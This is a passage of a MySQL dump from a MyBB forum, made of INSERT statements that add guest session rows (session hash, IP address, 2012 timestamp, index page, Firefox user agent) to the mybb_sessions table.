INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('6eb864cfaf357133c2ea1001ef91fcf6', '0', '225.168.158.7', '1352771740', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('cf17f0249cd6cb3ae495f0566b2d517d', '0', '166.118.254.128', '1352771741', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('86a17565cf2d569c4569039773e3f3ac', '0', '150.134.121.140', '1352771742', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('31f7f234c70830934b8bd24782520edd', '0', '154.219.192.99', '1352772411', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('32aab7ed3cec6889a221eee7ad6ccb9d', '0', '9.169.170.192', '1352772163', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('356b68b1afe6c84e8b3e8d6d200225d4', '0', '63.180.207.123', '1352771744', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('faec1bbf2ebdcb6323895da5154e2f54', '0', '160.134.80.30', '1352771744', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('c81ed5b5acfcc0bcb72757f874f41029', '0', '210.183.23.222', '1352771745', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('7113af008e14b7d994d8e371260e6a76', '0', '98.240.169.226', '1352771746', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('9246f1e4c8ff2d526264ab45a39a0069', '0', '98.48.18.47', '1352771746', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('0039359b837a614a212f2053f0baa15f', '0', '102.63.153.253', '1352771747', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('2ea770b9e76022871c9bd52058133cd1', '0', '243.225.12.201', '1352771748', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('40e3305e8b60b2ddb6f6483c4b937c5f', '0', '69.237.47.68', '1352771751', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('835fe5802a129b9129879f7587a70e37', '0', '224.118.56.245', '1352771754', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('67d7c535f3d62c89e5b77411760ddc55', '0', '204.207.100.241', '1352771757', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('2e2beaaca154c04cac47de5b168c85df', '0', '146.118.121.131', '1352771758', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('c08d6d246647c8e6f8c0edbbeb13c539', '0', '153.250.80.154', '1352771759', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('3b29c1d0a1aa272d7a107b969e05f05a', '0', '191.26.145.79', '1352771762', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('e64f06c1abb9f68de698c88657ee7560', '0', '140.90.91.220', '1352771760', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('80748ad33aef2d74db3fc19901bd1e21', '0', '76.31.72.175', '1352771763', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('f820aefb6c2f6c1873e15e74d6e7450b', '0', '184.153.139.187', '1352772068', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('c4e75f1df199f3c4d212c0bc8e6ea8a3', '0', '142.190.118.197', '1352771766', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('9276592c48b4d8280a03f1fc51f88a34', '0', '189.12.239.229', '1352771766', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('4aa68112972b9d9d3998f9ae2840b6af', '0', '54.1.241.75', '1352771768', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('cb41249c5acb66035b07fb4a621a36b2', '0', '64.192.57.27', '1352771768', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('90e62a920024b707d0ddf128662ecb31', '0', '56.79.90.176', '1352771769', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('b2fe5fa15ad1cc521b913523dd38df56', '0', '32.13.24.159', '1352771770', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('b386ddf28a18d33f9ce0029ef3a4111a', '0', '207.27.19.18', '1352771770', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('afad4836bbb7fababcafda52a0980dcd', '0', '95.23.169.72', '1352771771', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('91454e3e39cf56b6c467324177091a5a', '0', '186.11.91.172', '1352771773', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('fd459266e3cac38872bb21b26946e65e', '0', '242.46.216.112', '1352771774', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('6ca6e635bee02ea75f8a8b3bf86edf97', '0', '27.215.187.224', '1352771775', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('32e0c627d7e49a2fd165c216348c0ff4', '0', '0.78.83.91', '1352771777', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('a422aa007e592eb5373cb26c9ddb8b7f', '0', '220.177.218.157', '1352771778', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('7909112ab1af2ba27cf3919d71746948', '0', '22.252.159.168', '1352771779', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('d60458c3b93a6fe30643a634ae6941d5', '0', '197.226.197.209', '1352771779', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('1131bd09e81872c7efc7a6d767d5e52c', '0', '212.229.221.41', '1352771784', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('a2a05fcd4dafc8d687953016abda9268', '0', '132.15.63.166', '1352771785', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('30690dc4404dc2228f5767caefba1384', '0', '177.30.232.165', '1352771785', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('5b6c5ceff4b2033be46a56d5d8640b9a', '0', '15.127.3.189', '1352771787', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('f1346269eb08d629585b01356f4cca8d', '0', '182.157.236.4', '1352771788', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('809669aa1b881b20cc780baea60fac0c', '0', '229.38.141.199', '1352771789', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('4adf280bdc73e51a967658d633d246b4', '0', '13.139.94.232', '1352771790', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('d1e6647492629a62c8c0cfc9f946c5b2', '0', '209.42.14.148', '1352771791', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('1405e825fb65ba70536ea4a6dc4f6eae', '0', '49.15.66.56', '1352771791', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('f25af0e1c31c45d5c2214798bdc84e36', '0', '230.132.97.31', '1352771792', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('741c9460576cb95793264cd2162c67bf', '0', '129.195.139.76', '1352771794', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('a8937f8a6ea892ccdb8bf8083a200878', '0', '194.112.78.53', '1352771795', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('ba170c974784fc8d73887d11cd6716c0', '0', '99.60.185.179', '1352771795', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('7c808f02d923ad37d3ea1302dabb47ca', '0', '62.41.205.252', '1352771796', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('1e46156341f77cffb75861b85af4d574', '0', '178.80.109.132', '1352771797', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('274192226a0813d4dae5297705f46709', '0', '175.164.250.52', '1352771800', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('6200aa02c267bb97bdebc00acfbadcef', '0', '216.114.13.66', '1352771801', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('43dabca00e762a0a469e5511037084ff', '0', '53.216.73.103', '1352771801', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('faa2100ebd83371a0975661f006f2179', '0', '140.177.2.169', '1352771807', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('9fab66d89ab103df0534aac3881cd7c5', '0', '205.83.140.66', '1352771809', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('c371a8ab61df9c3c9a8f7fb26e50c459', '0', '226.148.25.228', '1352771810', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('4eb74ea8241feaeddbfba51a64f474ec', '0', '145.58.219.30', '1352771811', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('986d0844ae57223fe46cd59fef9981da', '0', '236.184.137.229', '1352771812', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('967a2ecbaed8df6a6457acbaaa932e2b', '0', '121.7.182.136', '1352771813', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('7bb08a9010f05c6c875b8f158e7fd029', '0', '49.14.167.232', '1352771814', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('ff5f4d9319290353cab0754d757635ee', '0', '24.7.242.156', '1352771816', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('189f5a98286497d6845ce68314fae114', '0', '119.87.254.252', '1352771817', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('c37182c2cc6ae788f34e854e5abb0ae9', '0', '37.153.169.75', '1352771818', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('de771a6779ef6bc49cd399ffde76a93a', '0', '38.127.63.186', '1352771819', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('a30e9ed99bf3864c6d8396b7d98a321b', '0', '225.40.142.186', '1352771820', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('8e121c3a727e312710b38ae60373691b', '0', '127.150.204.21', '1352771828', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('448749ca56ed63003b877254c4192bf4', '0', '150.223.108.94', '1352771829', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('3e6949bc0410a67d952c3041b69f2a27', '0', '71.89.34.197', '1352771829', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('2689b0b8d5236872062bf1315589b47a', '0', '93.165.71.138', '1352771830', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('c0e764d4765886e535457683aff9a2ee', '0', '228.112.78.192', '1352771831', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('9d15f28c3ca08180a829d624c24b5489', '0', '48.74.203.220', '1352771831', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('a4df0c46d8ef13e3623afbae0d93fd60', '0', '43.138.245.243', '1352771832', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('ee6729183031642dafd7cd512c7e7063', '0', '200.174.29.56', '1352771833', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('8ed6087c51fef96d1d2b21d0b246ace3', '0', '224.55.63.90', '1352771833', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('3008feb69d6ea553664d217b86445dc2', '0', '126.63.135.38', '1352771834', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('3a526dcba2e36c73e50bfbbb3d573b1c', '0', '74.191.76.26', '1352771835', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('9e92fe6fe050e9f813c7b31fdee1abff', '0', '211.248.170.87', '1352771835', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('8a249fb5419fb8a97d6a3ac45601d368', '0', '47.204.98.91', '1352771836', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES 